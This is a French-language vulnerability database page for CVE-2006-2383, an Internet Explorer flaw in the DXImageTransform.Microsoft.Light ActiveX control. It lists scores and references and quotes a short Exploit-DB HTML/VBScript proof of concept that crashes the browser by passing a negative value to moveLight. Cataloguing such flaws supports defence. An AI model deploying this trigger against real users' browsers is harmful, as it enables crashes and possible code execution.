CVE-2006-2383 : Détail

CVE-2006-2383

67.07%V4
Network
2006-06-13
17h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to execute arbitrary code via "unexpected data" related to "parameter validation" in the DXImageTransform.Microsoft.Light ActiveX control, which causes Internet Explorer to crash in a way that enables the code execution.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 27984

Date de publication : 2006-06-12 22h00 +00:00
Auteur : Will Dormann
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/18303/info The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution. An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page. <!-- MS Internet Explorer 6 DirectX Media DoS Vulnerability DLL: dxtmsft.dll Discovered & Coded by: r0ut3r (writ3r [at] gmail.com) Description: Sub moveLight ( ByVal lightNum As Long , ByVal x As Long , ByVal y As Long , ByVal z As Long , ByVal fAbsolute As Long ) Supplying negative parameters throws an access violation. --> <object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight"> Unable to create object </object> <script language="vbscript"> Sub go DXTLight.moveLight "-1", "1", "1", "1", "1" End Sub </script> <input language=VBScript type="button" value="Try me" onclick="go()">

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 5.01

Microsoft>>Internet_explorer >> Version 6

Références

http://secunia.com/advisories/20595
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/2319
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/18303
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1016291
Tags : vdb-entry, x_refsource_SECTRACK
http://www.us-cert.gov/cas/techalerts/TA06-164A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.osvdb.org/26444
Tags : vdb-entry, x_refsource_OSVDB
http://www.kb.cert.org/vuls/id/417585
Tags : third-party-advisory, x_refsource_CERT-VN